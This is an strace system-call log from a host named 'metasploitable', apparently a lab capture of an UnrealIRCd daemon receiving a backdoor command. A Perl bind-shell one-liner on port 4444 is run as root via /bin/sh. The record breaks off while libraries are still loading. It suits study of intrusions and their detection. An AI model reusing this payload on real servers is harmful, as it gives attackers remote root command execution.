4519  07:10:54.912586 select(1024, [2 3 4 7 9], [], NULL, {0, 750000}) = 1 (in [2], left {0, 600000})

4519  07:10:55.060895 clock_gettime(CLOCK_MONOTONIC, {1064, 877931248}) = 0

4519  07:10:55.060931 time(NULL)        = 1495624255

4519  07:10:55.060941 time(NULL)        = 1495624255

4519  07:10:55.060957 gettimeofday({1495624255, 60961}, NULL) = 0

4519  07:10:55.060970 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:10:55.061008 clock_gettime(CLOCK_MONOTONIC, {1064, 878020999}) = 0

4519  07:10:55.061037 gettimeofday({1495624255, 61041}, NULL) = 0

4519  07:10:55.061048 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:10:55.061181 clock_gettime(CLOCK_MONOTONIC, {1064, 878195440}) = 0

4519  07:10:55.061195 accept(2, 0, NULL) = 5

4519  07:10:55.061223 getpeername(5, {sa_family=AF_INET, sin_port=htons(46015), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:10:55.061372 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:10:55.061386 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:10:55.061412 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:10:55.061424 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:10:55.061435 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:10:55.061459 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:10:55.061473 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:10:55.061489 clock_gettime(CLOCK_MONOTONIC, {1064, 878503080}) = 0

4519  07:10:55.061501 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:10:55.061514 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:10:55.061523 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:10:55.061533 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:10:55.061543 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:10:55.061559 send(6, "\325\274\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:10:55.061612 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:10:55.061653 gettimeofday({1495624255, 61657}, NULL) = 0

4519  07:10:55.061665 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:10:55.068836 clock_gettime(CLOCK_MONOTONIC, {1064, 885857939}) = 0

4519  07:10:55.068859 recvfrom(6, "\325\274\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0m\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:10:55.068901 close(6)          = 0

4519  07:10:55.068918 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:10:55.068933 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:10:55.068999 time(NULL)        = 1495624255

4519  07:10:55.069012 time(NULL)        = 1495624255

4519  07:10:55.069025 gettimeofday({1495624255, 69028}, NULL) = 0

4519  07:10:55.069036 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:10:55.069066 clock_gettime(CLOCK_MONOTONIC, {1064, 886078903}) = 0

4519  07:10:55.069076 gettimeofday({1495624255, 69080}, NULL) = 0

4519  07:10:55.069087 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 0 (Timeout)

4519  07:10:56.069154 clock_gettime(CLOCK_MONOTONIC, {1065, 886163394}) = 0

4519  07:10:56.069154 gettimeofday({1495624256, 69155}, NULL) = 0

4519  07:10:56.069155 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:10:56.069155 clock_gettime(CLOCK_MONOTONIC, {1065, 886164110}) = 0

4519  07:10:56.069159 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:10:56.069199 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:10:56.069221 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:10:56.069233 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:10:56.069248 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 5832

5832  07:10:56.069334 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

5832  07:10:56.069349 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

5832  07:10:56.069360 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5832  07:10:56.069373 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

5832  07:10:56.069512 brk(0)            = 0x80f9000

5832  07:10:56.069551 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5832  07:10:56.069568 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fde000

5832  07:10:56.069584 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5832  07:10:56.069602 open("/etc/ld.so.cache", O_RDONLY) = 1

5832  07:10:56.069614 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5832  07:10:56.069633 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fd6000

5832  07:10:56.069643 close(1)          = 0

5832  07:10:56.069654 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5832  07:10:56.069670 open("/lib/libncurses.so.5", O_RDONLY) = 1

5832  07:10:56.069682 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

5832  07:10:56.069778 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

5832  07:10:56.069796 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fa6000

5832  07:10:56.069808 mmap2(0xb7fd3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fd3000

5832  07:10:56.069825 close(1)          = 0

5832  07:10:56.069836 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5832  07:10:56.069850 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5832  07:10:56.069864 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5832  07:10:56.069958 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5832  07:10:56.069984 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fa2000

5832  07:10:56.069998 mmap2(0xb7fa4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fa4000

5832  07:10:56.070015 close(1)          = 0

5832  07:10:56.070026 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5832  07:10:56.070040 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5832  07:10:56.070054 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5832  07:10:56.070143 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5832  07:10:56.070160 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fa1000

5832  07:10:56.070174 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e52000

5832  07:10:56.070185 mmap2(0xb7f9b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f9b000

5832  07:10:56.070200 mmap2(0xb7f9e000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f9e000

5832  07:10:56.070214 close(1)          = 0

5832  07:10:56.070236 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e51000

5832  07:10:56.070248 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e516b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5832  07:10:56.070303 mprotect(0xb7f9b000, 4096, PROT_READ) = 0

5832  07:10:56.070340 munmap(0xb7fd6000, 29913) = 0

5832  07:10:56.070367 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5832  07:10:56.070381 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

5832  07:10:56.070400 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfef70b0) = -1 ENOTTY (Inappropriate ioctl for device)

5832  07:10:56.070431 brk(0)            = 0x80f9000

5832  07:10:56.070441 brk(0x80fa000)    = 0x80fa000

5832  07:10:56.070453 brk(0x80fb000)    = 0x80fb000

5832  07:10:56.070469 getuid32()        = 0

5832  07:10:56.070487 getgid32()        = 0

5832  07:10:56.070496 geteuid32()       = 0

5832  07:10:56.070505 getegid32()       = 0

5832  07:10:56.070519 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5832  07:10:56.070533 time(NULL)        = 1495624256

5832  07:10:56.070546 brk(0x80fc000)    = 0x80fc000

5832  07:10:56.070561 brk(0x80fd000)    = 0x80fd000

5832  07:10:56.070581 open("/proc/meminfo", O_RDONLY) = 1

5832  07:10:56.070602 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

5832  07:10:56.070624 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdd000

5832  07:10:56.070636 read(1, "MemTotal:      1035240 kB\nMemFree:        632880 kB\nBuffers:         63532 kB\nCached:         183492 kB\nSwapCached:          0 kB\nActive:         252088 kB\nInactive:       123860 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        632640 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4304 kB\nWriteback:           0 kB\nAnonPages:      128976 kB\nMapped:          52004 kB\nSlab:            15132 kB\nSReclaimable:     7152 kB\nSUnreclaim:       7980 kB\nPageTables:       1956 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

5832  07:10:56.070721 close(1)          = 0

5832  07:10:56.070732 munmap(0xb7fdd000, 4096) = 0

5832  07:10:56.070744 brk(0x80fe000)    = 0x80fe000

5832  07:10:56.070770 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5832  07:10:56.070783 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5832  07:10:56.070796 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5832  07:10:56.070807 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5832  07:10:56.070819 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

5832  07:10:56.070831 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

5832  07:10:56.070845 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5832  07:10:56.070856 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5832  07:10:56.070869 uname({sys="Linux", node="metasploitable", ...}) = 0

5832  07:10:56.070918 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

5832  07:10:56.070936 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5832  07:10:56.070954 brk(0x8100000)    = 0x8100000

5832  07:10:56.070966 getcwd("/etc/unreal", 4096) = 12

5832  07:10:56.071031 getpid()          = 5832

5832  07:10:56.071049 getppid()         = 4519

5832  07:10:56.071080 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5832  07:10:56.071101 stat64("/sbin/sh", 0xbfef7088) = -1 ENOENT (No such file or directory)

5832  07:10:56.071113 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5832  07:10:56.071131 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5832  07:10:56.071155 socket(PF_FILE, SOCK_STREAM, 0) = 1

5832  07:10:56.071169 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5832  07:10:56.071181 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5832  07:10:56.071203 close(1)          = 0

5832  07:10:56.071215 socket(PF_FILE, SOCK_STREAM, 0) = 1

5832  07:10:56.071225 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5832  07:10:56.071235 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5832  07:10:56.071253 close(1)          = 0

5832  07:10:56.071266 open("/etc/nsswitch.conf", O_RDONLY) = 1

5832  07:10:56.071280 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

5832  07:10:56.071297 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdd000

5832  07:10:56.071308 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

5832  07:10:56.071358 read(1, "", 4096) = 0

5832  07:10:56.071367 close(1)          = 0

5832  07:10:56.071377 munmap(0xb7fdd000, 4096) = 0

5832  07:10:56.071397 open("/etc/ld.so.cache", O_RDONLY) = 1

5832  07:10:56.071409 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5832  07:10:56.071426 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fd6000

5832  07:10:56.071436 close(1)          = 0

5832  07:10:56.071456 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5832  07:10:56.071472 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

5832  07:10:56.071487 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

5832  07:10:56.071576 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

5832  07:10:56.071594 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e48000

5832  07:10:56.071606 mmap2(0xb7e4f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e4f000

5832  07:10:56.071623 close(1)          = 0

5832  07:10:56.071635 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5832  07:10:56.071648 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

5832  07:10:56.071662 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

5832  07:10:56.071749 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

5832  07:10:56.071766 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e30000

5832  07:10:56.071777 mmap2(0xb7e44000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e44000

5832  07:10:56.071793 mmap2(0xb7e46000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e46000

5832  07:10:56.071807 close(1)          = 0

5832  07:10:56.071832 munmap(0xb7fd6000, 29913) = 0

5832  07:10:56.071850 open("/etc/ld.so.cache", O_RDONLY) = 1

5832  07:10:56.071862 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5832  07:10:56.071878 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fd6000

5832  07:10:56.071888 close(1)          = 0

5832  07:10:56.071899 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5832  07:10:56.071917 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

5832  07:10:56.071932 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 